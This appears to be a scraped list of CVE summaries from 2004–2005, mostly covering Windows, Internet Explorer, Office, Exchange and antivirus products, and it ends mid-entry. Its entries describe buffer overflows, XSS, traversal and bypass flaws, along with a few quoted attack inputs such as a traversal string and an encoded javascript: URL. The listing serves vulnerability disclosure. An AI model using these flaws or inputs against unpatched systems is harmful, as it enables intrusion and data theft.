Mail Security for Exchange 4.5.4.743, when running on Windows, allows remote attackers to cause a denial of service (component crash) and avoid detection via a crafted RAR file. [CVE-2005-1286] Unquoted Windows search path vulnerability in BitDefender 8 allows local users to prevent BitDefender from starting by creating a malicious C:\program.exe, possibly due to the lack of quoting of the full pathname when executing a process. [CVE-2005-1272] Stack-based buffer overflow in the Backup Agent for Microsoft SQL Server in BrightStor ARCserve Backup Agent for SQL Server 11.0 allows remote attackers to execute arbitrary code via a long string sent to port (1) 6070 or (2) 6050. [CVE-2005-1216] Microsoft ISA Server 2000 allows remote attackers to connect to services utilizing the NetBIOS protocol via a NetBIOS connection with an ISA Server that uses the NetBIOS (all) predefined packet filter. [CVE-2005-1215] Microsoft ISA Server 2000 allows remote attackers to poison the ISA cache or bypass content restriction policies via a malformed HTTP request packet containing multiple Content-Length headers. [CVE-2005-1214] Microsoft Agent allows remote attackers to spoof trusted Internet content and execute arbitrary code by disguising security prompts on a malicious Web page. [CVE-2005-1213] Stack-based buffer overflow in the news reader for Microsoft Outlook Express (MSOE.DLL) 5.5 SP2, 6, and 6 SP1 allows remote malicious NNTP servers to execute arbitrary code via a LIST response with a long second field. [CVE-2005-1212] Buffer overflow in Microsoft Step-by-Step Interactive Training (orun32.exe) allows remote attackers to execute arbitrary code via a bookmark link file (.cbo, cbl, or .cbm extension) with a long User field. [CVE-2005-1211] Buffer overflow in the PNG image rendering component of Microsoft Internet Explorer allows remote attackers to execute arbitrary code via a crafted PNG file. [CVE-2005-1191] The Web View DLL (webvw.dll), as used in Windows Explorer on Windows 2000 systems, does not properly filter an apostrophe ("'") in the author name in a document, which allows attackers to execute arbitrary script via extra attributes when Web View constructs a mailto: link for the preview pane when the user selects the file. [CVE-2005-1185] Unquoted Windows search path vulnerability in Musicmatch Jukebox 10.00.2047 and earlier allows local users to gain privileges via a malicious C:\program.exe file, which is run by MMFWLaunch.exe when it attempts to execute launch.exe. [CVE-2005-1182] Unknown vulnerability in Incoming Remote Command (iSeries Access for Windows Remote Command service) in IBM OS/400 R510, R520, and R530 allows attackers to cause a denial of service (IRC shutdown) via certain inputs. [CVE-2005-1150] Unknown vulnerability in Sun Java System Web Server 6.0 SP7 and earlier, when running on Windows systems, allows attackers to cause a denial of service (hang). [CVE-2005-1106] PictureViewer in QuickTime for Windows 6.5.2 allows remote attackers to cause a denial of service (application crash) via a GIF image with the maximum depth start value, possibly triggering an integer overflow. [CVE-2005-1052] Microsoft Outlook 2003 and Outlook Web Access (OWA) 2003 do not properly display comma separated addresses in the From field in an e-mail message, which could allow remote attackers to spoof e-mail addresses. [CVE-2005-1045] OpenText FirstClass 8.0 client does not properly sanitize strings before passing them to the Windows ShellExecute API, which allows remote attackers to execute arbitrary commands via a UNC path in a bookmark. [CVE-2005-0954] Windows Explorer and Internet Explorer in Windows 2000 SP1 allows remote attackers to cause a denial of service (CPU consumption) via a malformed Windows Metafile (WMF) file. [CVE-2005-0944] Unknown vulnerability in Microsoft Jet DB engine (msjet40.dll) 4.00.8618.0, related to insufficient data validation, allows remote attackers to execute arbitrary code via a crafted mdb file. [CVE-2005-0921] Microsoft Outlook 2002 Connector for IBM Lotus Domino 2.0 allows local users to save passwords and login credentials locally, even when password caching is disabled by a group policy. [CVE-2005-0904] Remote Desktop in Windows XP SP1 does not verify the "Force shutdown from a remote system" setting, which allows remote attackers to shut down the system by executing TSShutdn.exe. [CVE-2005-0871] calendar_scheduler.php in Topic Calendar 1.0.1 module for phpBB, when running on a Microsoft IIS server, allows remote attackers to obtain sensitive information via invalid parameters, which reveal the path in an error message. [CVE-2005-0820] Microsoft Office InfoPath 2003 SP1 includes sensitive information in the Manifest.xsf file in a custom .xsn form, which allows attackers to obtain printer and network information, obtain the database name, username, and password, or obtain the internal web server name. [CVE-2005-0803] The GetEnhMetaFilePaletteEntries API in GDI32.DLL in Windows 2000 allows remote attackers to cause a denial of service (application crash) via a crafted Enhanced Metafile (EMF) file that causes invalid (1) end, (2) emreof, or (3) palent offsets to be used, aka "Enhanced Metafile Vulnerability." [CVE-2005-0773] Stack-based buffer overflow in VERITAS Backup Exec Remote Agent 9.0 through 10.0 for Windows, and 9.0.4019 through 9.1.307 for Netware allows remote attackers to execute arbitrary code via a CONNECT_CLIENT_AUTH request with authentication method type 3 (Windows credentials) and a long password argument. [CVE-2005-0772] VERITAS Backup Exec 9.0 through 10.0 for Windows Servers, and 9.0.4019 through 9.1.307 for Netware, allows remote attackers to cause a denial of service (Remote Agent crash) via (1) a crafted packet in NDMLSRVR.DLL or (2) a request packet with an invalid (non-0) "Error Status" value, which triggers a null dereference. [CVE-2005-0771] VERITAS Backup Exec Server (beserver.exe) 9.0 through 10.0 for Windows allows remote unauthenticated attackers to modify the registry by calling methods to the RPC interface on TCP port 6106. [CVE-2005-0738] Stack consumption vulnerability in Microsoft Exchange Server 2003 SP1 allows users to cause a denial of service (hang) by deleting or moving a folder with deeply nested subfolders, which causes Microsoft Exchange Information Store service (Store.exe) to hang as a result of a large number of recursive calls. [CVE-2005-0688] Windows Server 2003 and XP SP2, with Windows Firewall turned off, allows remote attackers to cause a denial of service (CPU consumption) via a TCP packet with the SYN flag set and the same destination and source address and port, aka a reoccurrence of the "Land" vulnerability (CVE-1999-0016). [CVE-2005-0573] Gaim 1.1.3 on Windows systems allows remote attackers to cause a denial of service (client crash) via a file transfer in which the filename contains "(" or ")" (parenthesis) characters. [CVE-2005-0564] Stack-based buffer overflow in Microsoft Word 2000 and Word 2002, and Microsoft Works Suites 2000 through 2004, might allow remote attackers to execute arbitrary code via a .doc file with long font information. [CVE-2005-0563] Cross-site scripting (XSS) vulnerability in Microsoft Outlook Web Access (OWA) component in Exchange Server 5.5 allows remote attackers to inject arbitrary web script or HTML via an email message with an encoded javascript: URL ("jav&#X41sc&#0010 [CVE-2005-0558] Buffer overflow in Microsoft Word 2000, Word 2002, and Word 2003 allows remote attackers to execute arbitrary code via a crafted document. [CVE-2005-0555] Buffer overflow in the Content Advisor in Microsoft Internet Explorer 5.01, 5.5, and 6 allows remote attackers to execute arbitrary code via a crafted Content Advisor file, aka "Content Advisor Memory Corruption Vulnerability." [CVE-2005-0554] Buffer overflow in the URL processor of Microsoft Internet Explorer 5.01, 5.5, and 6 allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a URL with a long hostname, aka "URL Parsing Memory Corruption Vulnerability." [CVE-2005-0553] Race condition in the memory management routines in the DHTML object processor in Microsoft Internet Explorer 5.01, 5.5, and 6 allows remote attackers to execute arbitrary code via a malicious web page or HTML e-mail, aka "DHTML Object Memory Corruption Vulnerability". [CVE-2005-0500] Internet Explorer 6.0 on Windows XP SP2 allows remote attackers to spoof the domain name of a URL in a titlebar for a script-initiated popup window, which could facilitate phishing attacks. [CVE-2005-0452] Multiple cross-site scripting (XSS) vulnerabilities in Microsoft ASP.NET (.Net) 1.0 and 1.1 to SP1 allow remote attackers to inject arbitrary HTML or web script via Unicode representations for ASCII fullwidth characters that are converted to normal ASCII characters, including ">" and "<". [CVE-2005-0425] Unknown vulnerability in IBM Websphere Application Server 5.0, 5.1, and 6.0 when running on Windows, allows remote attackers to obtain the source code for Java Server Pages (.jsp) via a crafted URL that causes the page to be processed by the file serving servlet instead of the JSP engine. [CVE-2005-0420] Microsoft Outlook Web Access (OWA), when used with Exchange, allows remote attackers to redirect users to arbitrary URLs for login via a link to the owalogon.asp application. [CVE-2005-0416] The Windows Animated Cursor (ANI) capability in Windows NT, Windows 2000 through SP4, Windows XP through SP1, and Windows 2003 allows remote attackers to execute arbitrary code via the AnimationHeaderBlock length field, which leads to a stack-based buffer overflow. [CVE-2005-0360] The Microsoft Log Sink Class ActiveX control in pkmcore.dll is marked as "safe for scripting" for Internet Explorer, which allows remote attackers to create or append to arbitrary files. [CVE-2005-0324] Infinite Mobile Delivery Webmail 2.6 allows remote attackers to gain sensitive information via an HTTP request that contains invalid characters for a Windows foldername, which reveals the path in an error message. [CVE-2005-0230] Firefox 1.0 does not prevent the user from dragging an executable file to the desktop when it has an image/gif content type but has a dangerous extension such as .bat or .exe, which allows remote attackers to bypass the intended restriction and execute arbitrary commands via malformed GIF files that can still be parsed by the Windows batch file parser, aka "firedragging." [CVE-2005-0148] Thunderbird before 0.9, when running on Windows systems, uses the default handler when processing javascript: links, which invokes Internet Explorer and may expose the Thunderbird user to vulnerabilities in the version of Internet Explorer that is installed on the user's system. NOTE: since the invocation between multiple products is a common practice, and the vulnerabilities inherent in multi-product interactions are not easily enumerable, this issue might be REJECTED in the future. [CVE-2005-0110] Internet Explorer 6 on Windows XP SP2 allows remote attackers to bypass the file download warning dialog and possibly trick an unknowledgeable user into executing arbitrary code via a web page with a body element containing an onclick tag, as demonstrated using the createElement function. [CVE-2005-0083] MySQL MaxDB 7.5.00 for Windows, and possibly earlier versions and other platforms, allows remote attackers to cause a denial of service (application crash) via invalid parameters to the (1) DBMCli_String::ReallocString, (2) DBMCli_String::operator, (3) DBMCli_Buffer::ForceResize, (4) DBMCli_Wizard::InstallDatabase, (5) DBMCli_Devspaces::Complete, (6) DBMWeb_TemplateWizard::askForWriteCountStep5, or (7) DBMWeb_DBMWeb::wizardDB functions, which triggers a null dereference. [CVE-2005-0057] The Hyperlink Object Library for Windows 98, 2000, XP, and Server 2003 allows remote attackers to execute arbitrary code via a crafted link that triggers an "unchecked buffer" in the library, possibly due to a buffer overflow. [CVE-2005-0051] The Server service (srvsvc.dll) in Windows XP SP1 and SP2 allows remote attackers to obtain sensitive information (users who are accessing resources) via an anonymous logon using a named pipe, which is not properly authenticated, aka the "Named Pipe Vulnerability." [CVE-2005-0050] The License Logging service for Windows NT Server, Windows 2000 Server, and Windows Server 2003 does not properly validate the length of messages, which leads to an "unchecked buffer" and allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code, aka the "License Logging Service Vulnerability." [CVE-2005-0049] Windows SharePoint Services and SharePoint Team Services for Windows Server 2003 does not properly validate an HTTP redirection query, which allows remote attackers to inject arbitrary HTML and web script via a cross-site scripting (XSS) attack, or to spoof the web cache. [CVE-2005-0047] Windows 2000, XP, and Server 2003 does not properly "validate the use of memory regions" for COM structured storage files, which allows attackers to execute arbitrary code, aka the "COM Structured Storage Vulnerability." [CVE-2005-0045] The Server Message Block (SMB) implementation for Windows NT 4.0, 2000, XP, and Server 2003 does not properly validate certain SMB packets, which allows remote attackers to execute arbitrary code via Transaction responses containing (1) Trans or (2) Trans2 commands, aka the "Server Message Block Vulnerability," and as demonstrated using Trans2 FIND_FIRST2 responses with large file name length fields. [CVE-2005-0044] The OLE component in Windows 98, 2000, XP, and Server 2003, and Exchange Server 5.0 through 2003, does not properly validate the lengths of messages for certain OLE data, which allows remote attackers to execute arbitrary code, aka the "Input Validation Vulnerability." [CVE-2004-2694] Microsoft Outlook Express 6.0 allows remote attackers to bypass intended access restrictions, load content from arbitrary sources into the Outlook context, and facilitate phishing attacks via a "BASE HREF" with the target set to "_top". [CVE-2004-2657] * DISPUTED Mozilla Firefox 1.5.0.1, and possibly other versions, preserves some records of user activity even after uninstalling, which allows local users who share a Windows profile to view the records after a new installation of Firefox, as reported for the list of Passwords Never Saved web sites. NOTE: The vendor has disputed this issue, stating that "The uninstaller is primarily there to uninstall the application. It is not there to uninstall user data. For the moment I will stick by my module-owner decision." [CVE-2004-2643] Directory traversal vulnerability in Microsoft cabarc allows remote attackers to overwrite files via "../" sequences in file names in a CAB archive. [CVE-2004-2635] An ActiveX control for McAfee Security Installer Control System 4.0.0.81 allows remote attackers to access the Windows registry via web pages that use the control's RegQueryValue() method. [CVE-2004-2628] Multiple directory traversal vulnerabilities in thttpd 2.07 beta 0.4, when running on Windows, allow remote attackers to read arbitrary files via a URL that contains (1) a hex-encoded backslash dot-dot sequence ("%5C..") or (2) a drive letter (such as "C:"). [CVE-2004-2609] The stuffit.com executable on Symantec PowerQuest DeployCenter 5.5 boot disks allows local users to obtain sensitive information (an unencrypted password for a Windows domain account) via four "stuffit /f:stuffit.dat" invocations, possibly due to a buffer overflow. [CVE-2004-2594] Absolute path traversal vulnerability in Quake II server before R1Q2 on Windows, as used in multiple products, allows remote attackers to read arbitrary files via a "\/" in a pathname argument, as demonstrated by "download \/server.cfg". [CVE-2004-2565] Multiple directory traversal vulnerabilities in Sambar Server 6.1 Beta 2 on Windows, and possibly other versions on Linux, when the administrative IP address restrictions have been modified from the default, allow remote authenticated users to read arbitrary files via (1) a "..\" (dot dot backslash) in the file parameter to showini.asp, or (2) an absolute path with drive letter in the log parameter to showlog.asp. [CVE-2004-2564] Multiple cross-site scripting (XSS) vulnerabilities in Sambar Server 6.1 Beta 2 on Windows, and possibly other versions on Linux, allow remote attackers to inject arbitrary web script or HTML via (1) the show parameter in show.asp and (2) the title parameter in showperf.asp. [CVE-2004-2555] Riverdeep FoolProof Security 3.9.x on Windows 98 and Windows ME uses weak cryptography (arithmetic and XOR operations) to relate the Control password to the Administrator password, which allows local users to calculate the Administrator password if they know the Control password and password recovery key. [CVE-2004-2482] Microsoft Outlook 2000 and 2003, when configured to use Microsoft Word 2000 or 2003 as the e-mail editor and when forwarding e-mail, does not properly handle an opening OBJECT tag that does not have a closing OBJECT tag, which causes Outlook to automatically download the URI in the data property of the OBJECT tag and might allow remote attackers to execute arbitrary code. [CVE-2004-2476] Microsoft Internet Explorer 6.0 allows remote attackers to cause a denial of service (infinite loop and crash) via an IFRAME with "?" as the file source. [CVE-2004-2442] Multiple interpretation error in various F-Secure Anti-Virus products, including Workstation 5.43 and earlier, Windows Servers 5.50 and earlier, MIMEsweeper 5.50 and earlier, Anti-Virus for Linux Servers and Gateways 4.61 and earlier, and other products, allows remote attackers to bypass antivirus protection via a compressed file with both local and global headers set to zero, which does not prevent the compressed file from being opened on the target system. [CVE-2004-2434] Microsoft Internet Explorer 6.0 SP1 allows remote attackers to cause a denial of service (browser crash) via a link with "::{" (colon colon left brace), which triggers a null dereference when the user attempts to save the link using "Save As" and Internet Explorer prepares an error message with an attacker-controlled format string. [CVE-2004-2383] Microsoft Internet Explorer 5.0 through 6.0 allows remote attackers to bypass cross-frame scripting restrictions and capture keyboard events from other domains via an HTML document with Javascript that is outside a frameset that includes the target domain, then forcing the frameset to maintain focus. NOTE: the discloser claimed that the vendor does not categorize this as a vulnerability, but it can be used in a spoofing scenario [CVE-2004-2382] The PerfectNav plugin for Microsoft Internet Explorer allows remote attackers to cause a denial of service (browser crash) via a malformed URL such as "?". [CVE-2004-2379] Multiple cross-site scripting (XSS) vulnerabilities in @Mail 3.64 for Windows allow remote attackers to inject arbitrary web script or HTML via (1) the Displayed Name attribute in util.pl and (2) the Folder attribute in showmail.pl. [CVE-2004-2378] @Mail 3.64 for Windows allows remote attackers to cause a denial of service ("unusable" server) via a large number of POP3 connections to the server. [CVE-2004-2296] The preview_review function in the Reviews module in PHP-Nuke 6.0 to 7.3, when running on Windows systems, allows remote attackers to obtain sensitive information via an invalid date parameter, which generates an error message. [CVE-2004-2276] F-Secure Anti-Virus 5.41 and 5.42 on Windows, Client Security 5.50 and 5.52, 4.60 for Samba Servers, and 4.52 and earlier for Linux does not properly detect certain viruses in a PKZip archive, which allows viruses such as Sober.D and Sober.G to bypass initial detection. [CVE-2004-2220] F-Secure Anti-Virus for Microsoft Exchange 6.30 and 6.31 does not properly detect certain password-protected files in a ZIP file, which allows remote attackers to bypass anti-virus protection. [CVE-2004-2219] Microsoft Internet Explorer 6 allows remote attackers to spoof the address bar to facilitate phishing attacks via Javascript that uses an invalid URI, modifies the Location field, then uses history.back to navigate to the previous domain, aka NullyFake. [CVE-2004-2179] asycpict.dll, as used in Microsoft products such as Front Page 97 and 98, allows remote attackers to cause a denial of service (hang) via a JPEG image with maximum height and width values. [CVE-2004-2147] Unknown versions of Symantec Norton AntiVirus and Microsoft Outlook allow attackers to cause a denial of service (crash) via malformed e-mail messages (1) without a body or (2) without a carriage return ("\n") separating the headers from the body. [CVE-2004-2091] Microsoft Baseline Security Analyzer (MBSA) 1.2 does not correctly identify systems that have been patched but remain vulnerable to exploit until the system is rebooted, possibly giving the administrator a false sense of security. [CVE-2004-2090] Microsoft Internet Explorer 5.0.1 through 6.0 allows remote attackers to determine the existence of arbitrary files via the VBScript LoadPicture method, which returns an error code if the file does not exist. [CVE-2004-2070] The Altiris Client Service for Windows 5.6 SP1 Hotfix E (5.6.181) allows local users to execute arbitrary commands by opening the AClient tray icon and using the View Log File option, a different vulnerability than CVE-2005-1590. [CVE-2004-2022] ActivePerl 5.8.x and others, and Larry Wall's Perl 5.6.1 and others, when running on Windows systems, allows attackers to cause a denial of service (crash) and possibly execute arbitrary code via a long argument to the system command, which leads to a stack-based buffer overflow. NOTE: it is unclear whether this bug is in Perl or the OS API that is used by Perl. [CVE-2004-2005] Buffer overflow in Eudora for Windows 5.2.1, 6.0.3, and 6.1 allows remote attackers to execute arbitrary code via an e-mail with (1) a link to a long URL to the C drive or (2) a long attachment name. [CVE-2004-1944] Eudora 6.1 and 6.0.3 for Windows allows remote attackers to cause a denial of service (crash) via a deeply nested multipart MIME message. [CVE-2004-1922] Microsoft Internet Explorer 5.5 and 6.0 allocates memory based on the memory size written in the BMP file instead of the actual BMP file size, which allows remote attackers to cause a denial of service (memory consumption) via a small BMP file with has a large memory size. [CVE-2004-1777] A "range check error" in Skype for Windows before 0.98.0.28 allows local and remote attackers to cause a denial of service (application crash) via long command line arguments or a long callto:// URL, a different vulnerability than CVE-2004-1114. [CVE-2004-1686] Internet Explorer 6.0 in Windows XP SP2 allows remote attackers to bypass the Information Bar prompt for ActiveX and Javascript via an XHTML page that contains an Internet Explorer formatted comment between the DOCTYPE tag and the HTML tag, as demonstrated using the DesignScience MathPlayer ActiveX plugin. [CVE-2004-1649] Buffer overflow in Microsoft Msinfo32.exe might allow local users to execute arbitrary code via a long filename in the msinfo_file command line parameter. NOTE: this issue might not cross security boundaries, so it may be REJECTED in the future. [CVE-2004-1623] The WAV file property handler in Windows XP SP1 allows remote attackers to cause a denial of service (infinite loop in Explorer) via a WAV file with an invalid file header whose fmt chunk length is set to 0xFFFFFFFF. [CVE-2004-1560] Microsoft SQL Server 7.0 allows remote attackers to cause a denial of service (mssqlserver service halt) via a long request to TCP port 1433, possibly triggering a buffer overflow. [CVE-2004-1527] Microsoft Internet Explorer 6.0 SP1 does not properly handle certain character strings in the Path attribute, which can cause it to modify cookies in other domains when the attacker's domain name is within the target's domain name or when wildcard DNS is being used, which allows remote attackers to hijack web sessions. [CVE-2004-1481] Integer overflow in pnen3260.dll in RealPlayer 8 through 10.5 (6.0.12.1040) and earlier, and RealOne Player 1 or 2 on Windows or Mac OS, allows remote attackers to execute arbitrary code via a SMIL file and a .rm movie file with a large length field for the data chunk, which leads to a heap-based buffer overflow. [CVE-2004-1380] Firefox before 1.0 and Mozilla before 1.7.5 allows inactive (background) tabs to launch dialog boxes, which can allow remote attackers to spoof the dialog boxes from web sites in other windows and facilitate phishing attacks, aka the "Dialog Box Spoofing Vulnerability." [CVE-2004-1376] Directory traversal vulnerability in Microsoft Internet Explorer 5.01, 5.5, and 6.0 allows remote malicious FTP servers to overwrite arbitrary files via .. (dot dot) sequences in filenames returned from a LIST command. [CVE-2004-1361] Integer underflow in winhlp32.exe in Windows NT, Windows 2000 through SP4, Windows XP through SP2, and Windows 2003 allows remote attackers to execute arbitrary code via a malformed .hlp file, which leads to a heap-based buffer overflow. [CVE-2004-1331] The execCommand method in Microsoft Internet Explorer 6.0 SP2 allows remote attackers to bypass the "File Download - Security Warning" dialog and save arbitrary files with arbitrary extensions via the SaveAs command. [CVE-2004-1322] Cisco Unity 2.x, 3.x, and 4.x, when integrated with Microsoft Exchange, has several hard coded usernames and passwords, which allows remote attackers to gain unauthorized access and change configuration settings or read outgoing or incoming e-mail messages. [CVE-2004-1317] Stack-based buffer overflow in doexec.c in Netcat for Windows 1.1, when running with the -e option, allows remote attackers to execute arbitrary code via a long DNS command. [CVE-2004-1312] A bug in the HTML parser in a certain Microsoft HTML library, as used in various third party products, may allow remote attackers to cause a denial of service via certain strings, as reported in GFI MailEssentials for Exchange 9 and 10, and GFI MailSecurity for Exchange 8, which causes emails to remain in IIS or Exchange mail queues. [CVE-2004-1306] Heap-based buffer overflow in winhlp32.exe in Windows NT, Windows 2000 through SP4, Windows XP through SP2, and Windows 2003 allows remote attackers to execute arbitrary code via a crafted .hlp file. [CVE-2004-1305] The Windows Animated Cursor (ANI) capability in Windows NT, Windows 2000 through SP4, Windows XP through SP1, and Windows 2003 allow remote attackers to cause a denial of service via (1) the frame number set to zero, which causes an invalid memory address to be used and leads to a kernel crash, or (2) the rate number set to zero, which leads to resource exhaustion and hang. [CVE-2004-1244] Windows Media Player 9 allows remote attackers to execute arbitrary code via a PNG file containing large (1) width or (2) height values, aka the "PNG Processing Vulnerability." [CVE-2004-1198] Microsoft Internet Explorer allows remote attackers to cause a denial of service (application crash from memory consumption), as demonstrated using Javascript code that continuously creates nested arrays and then sorts the newly created arrays. [CVE-2004-1166] CRLF injection vulnerability in Microsoft Internet Explorer 6.0.2800.1106 and earlier allows remote attackers to execute arbitrary FTP commands via an ftp:// URL that contains a URL-encoded newline ("%0a") before the FTP command, which causes the commands to be inserted into the resulting FTP session, as demonstrated using a PORT command. [CVE-2004-1155] Internet Explorer 5.01 through 6 allows remote attackers to spoof arbitrary web sites by injecting content from one window into another window whose name is known but resides in a different domain, as demonstrated using a pop-up window on a trusted web site, aka the "window injection" vulnerability. NOTE: later research shows that Internet Explorer 7 on Windows XP SP2 is also vulnerable. [CVE-2004-1134] Buffer overflow in the Microsoft W3Who ISAPI (w3who.dll) allows remote attackers to cause a denial of service and possibly execute arbitrary code via a long query string. [CVE-2004-1133] Multiple cross-site scripting (XSS) vulnerabilities in Microsoft W3Who ISAPI (w3who.dll) allow remote attackers to inject arbitrary HTML and web script via (1) HTTP headers such as "Connection" or (2) invalid parameters whose values are echoed in the resulting error message. [CVE-2004-1122] Safari 1.x to 1.2.4, and possibly other versions, allows inactive windows to launch dialog boxes, which can allow remote attackers to spoof the dialog boxes from web sites in other windows, aka the "Dialog Box Spoofing Vulnerability," a different vulnerability than CVE-2004-1314. [CVE-2004-1104] Microsoft Internet Explorer 6.0 SP2 allows remote attackers to spoof a legitimate URL in the status bar and conduct a phishing attack via a web page that contains a BASE element that points to the legitimate site, followed by an anchor (a) element with an empty "href" attribute, and a FORM whose action points to a malicious URL, and an INPUT submit element that is modified to look like a legitimate URL. [CVE-2004-1099] Cisco Secure Access Control Server for Windows (ACS Windows) and Cisco Secure Access Control Server Solution Engine (ACS Solution Engine) 3.3.1, when the EAP-TLS protocol is enabled, does not properly handle expired or untrusted certificates, which allows remote attackers to bypass authentication and gain unauthorized access via a "cryptographically correct" certificate with valid fields such as the username. [CVE-2004-1043] Internet Explorer 6.0 on Windows XP SP2 allows remote attackers to execute arbitrary code by using the "Related Topics" command in the Help ActiveX Control (hhctrl.ocx) to open a Help popup window containing the PCHealth tools.htm file in the local zone and injecting Javascript to be executed, as demonstrated using "writehta.txt" and the ADODB recordset, which saves a .HTA file to the local system, aka the "HTML Help ActiveX control Cross Domain Vulnerability." [CVE-2004-1038] A design error in the IEEE1394 specification allows attackers with physical access to a device to read and write to sensitive memory using a modified FireWire/IEEE 1394 client, thus bypassing intended restrictions that would normally require greater degrees of physical access to exploit. NOTE: this was reported in 2008 to affect Windows Vista, but some Linux-based operating systems have protection mechanisms against this attack. [CVE-2004-1023] Kerio Winroute Firewall before 6.0.9, ServerFirewall before 1.0.1, and MailServer before 6.0.5, when installed on Windows based systems, do not modify the ACLs for critical files, which allows local users with Power Users privileges to modify programs, install malicious DLLs in the plug-ins folder, and modify XML files related to configuration. [CVE-2004-0988] Integer overflow on Apple QuickTime before 6.5.2, when running on Windows systems, allows remote attackers to cause a denial of service (memory consumption) via certain inputs that cause a large memory operation. [CVE-2004-0985] Internet Explorer 6.x on Windows XP SP2 allows remote attackers to execute arbitrary code, as demonstrated using a document with a draggable file type such as .xml, .doc, .py, .cdf, .css, .pdf, or .ppt, and using ADODB.Connection and ADODB.recordset to write to a .hta file that is interpreted in the Local Zone by HTML Help. [CVE-2004-0979] Internet Explorer on Windows XP does not properly modify the "Drag and Drop or copy and paste files" setting when the user sets it to "Disable" or "Prompt," which may enable security-sensitive operations that are inconsistent with the user's intended configuration. [CVE-2004-0964] Buffer overflow in Zinf 2.2.1 on Windows, and other older versions for Linux, allows remote attackers or local users to execute arbitrary code via certain values in a .pls file. [CVE-2004-0963] Buffer overflow in Microsoft Word 2002 (10.6612.6714) SP3, and possibly other versions, allows remote attackers to cause a denial of service (application exception) and possibly execute arbitrary code in winword.exe via certain unexpected values in a .doc file, including (1) an offset that triggers an out-of-bounds memory access, (2) a certain value that causes a large memory copy as triggered by an integer conversion error, and other values. [CVE-2004-0937] Sophos Anti-Virus before 3.87.0, and Sophos Anti-Virus for Windows 95, 98, and Me before 3.88.0, allows remote attackers to bypass antivirus protection via a compressed file with both local and global headers set to zero, which does not prevent the compressed file from being opened on a target system. [CVE-2004-0928] The Microsoft IIS Connector in JRun 4.0 and Macromedia ColdFusion MX 6.0, 6.1, and 6.1 J2EE allows remote attackers to bypass authentication and view source files, such as .asp, .pl, and .php files, via an HTTP request that ends in " [CVE-2004-0894] LSASS (Local Security Authority Subsystem Service) of Windows 2000 Server and Windows Server 2003 does not properly validate connection information, which allows local users to gain privileges via a specially-designed program. [CVE-2004-0893] The Local Procedure Call (LPC) interface of the Windows Kernel for Windows NT 4.0, Windows 2000, Windows XP, and Windows Server 2003 does not properly validate the lengths of messages sent to the LPC port, which allows local users to gain privileges, aka "Windows Kernel Vulnerability." [CVE-2004-0892] Microsoft Proxy Server 2.0 and Microsoft ISA Server 2000 (which is included in Small Business Server 2000 and Small Business Server 2003 Premium Edition) allows remote attackers to spoof trusted Internet content on a specially crafted webpage via spoofed reverse DNS lookup results. [CVE-2004-0848] Buffer overflow in Microsoft Office XP allows remote attackers to execute arbitrary code via a link with a URL file location containing long inputs after (1) "%00 (null byte) in .doc filenames or (2) "%0a" (carriage return) in .rtf filenames. [CVE-2004-0847] The Microsoft .NET forms authentication capability for ASP.NET allows remote attackers to bypass authentication for .aspx files in restricted directories via a request containing a (1) "\" (backslash) or (2) "%5C" (encoded backslash), aka "Path Validation Vulnerability." [CVE-2004-0846] Unknown vulnerability in Microsoft Excel 2000, 2002, 2001 for Mac, and v.X for Mac allows remote attackers to execute arbitrary code via a malicious file containing certain parameters that are not properly validated. [CVE-2004-0839] Internet Explorer in Windows XP SP2, and other versions including 5.01 and 5.5, allows remote attackers to install arbitrary programs via a web page that uses certain styles and the AnchorClick behavior, popup windows, and drag-and-drop capabilities to drop the program in the local startup folder, as demonstrated by "wottapoop.html". [CVE-2004-0830] The Content Scanner Server in F-Secure Anti-Virus for Microsoft Exchange 6.21 and earlier, F-Secure Anti-Virus for Microsoft Exchange 6.01 and earlier, and F-Secure Internet Gatekeeper 6.32 and earlier allow remote attackers to cause a denial of service (service crash due to unhandled exception) via a certain malformed packet. [CVE-2004-0829] smbd in Samba before 2.2.11 allows remote attackers to cause a denial of service (daemon crash) by sending a FindNextPrintChangeNotify request without a previous FindFirstPrintChangeNotify, as demonstrated by the SMB client in Windows XP SP2. [CVE-2004-0775] Buffer overflow in WIDCOMM Bluetooth Connectivity Software, as used in products such as BTStackServer 1.3.2.7 and 1.4.2.10, Windows XP and Windows 98 with MSI Bluetooth Dongles, and HP IPAQ 5450 running WinCE 3.0, allows remote attackers to execute arbitrary code via certain service requests. [CVE-2004-0774] RealNetworks Helix Universal Server 9.0.2 for Linux and 9.0.3 for Windows allows remote attackers to cause a denial of service (CPU and memory exhaustion) via a POST request with a Content-Length header set to -1. [CVE-2004-0728] The Remote Control Client service in Microsoft's Systems Management Server (SMS) 2.50.2726.0 allows remote attackers to cause a denial of service (crash) via a data packet to TCP port 2702 that causes the server to read or write to an invalid memory address. [CVE-2004-0723] Microsoft Java virtual machine (VM) 5.0.0.3810 allows remote attackers to bypass sandbox restrictions to read or write certain data between applets from different domains via the "GET/Key" and "PUT/Key/Value" commands, aka "cross-site Java." [CVE-2004-0719] Internet Explorer for Mac 5.2.3, Internet Explorer 6 on Windows XP, and possibly other versions, does not properly prevent a frame in one domain from injecting content into a frame that belongs to another domain, which facilitates web site spoofing and other attacks, aka the frame injection vulnerability. [CVE-2004-0717] Opera 7.51 for Windows and 7.50 for Linux does not properly prevent a frame in one domain from injecting content into a frame that belongs to another domain, which facilitates web site spoofing and other attacks, aka the frame injection vulnerability. [CVE-2004-0712] The configuration tools (1) config.sh in Unix or (2) config.cmd in Windows for BEA WebLogic Server 8.1 through SP2 create a log file that contains the administrative username and password in cleartext, which could allow local users to gain privileges. [CVE-2004-0610] The Web administration interface in Microsoft MN-500 Wireless Router allows remote attackers to cause a denial of service (connection refusal) via a large number of open HTTP connections. [CVE-2004-0573] Buffer overflow in the converter for Microsoft WordPerfect 5.x on Office 2000, Office XP, Office 2003, and Works Suites 2001 through 2004 allows remote attackers to execute arbitrary code via a malicious document or website. [CVE-2004-0572] Buffer overflow in the Windows Program Group Converter (grpconv.exe) may allow remote attackers to execute arbitrary code via a shell: URL with a long filename and a .grp extension, which is not properly handled when the shell capability launches grpconv.exe. [CVE-2004-0568] HyperTerminal application for Windows NT 4.0, Windows 2000, Windows XP, and Windows Server 2003 does not properly validate the length of a value that is saved in a session file, which allows remote attackers to execute arbitrary code via a malicious HyperTerminal session file (.ht), web site, or Telnet URL contained in an e-mail message, triggering a buffer overflow. [CVE-2004-0567] The Windows Internet Naming Service (WINS) in Windows NT Server 4.0 SP 6a, NT Terminal Server 4.0 SP 6, Windows 2000 Server SP3 and SP4, and Windows Server 2003 does not properly validate the computer name value in a WINS 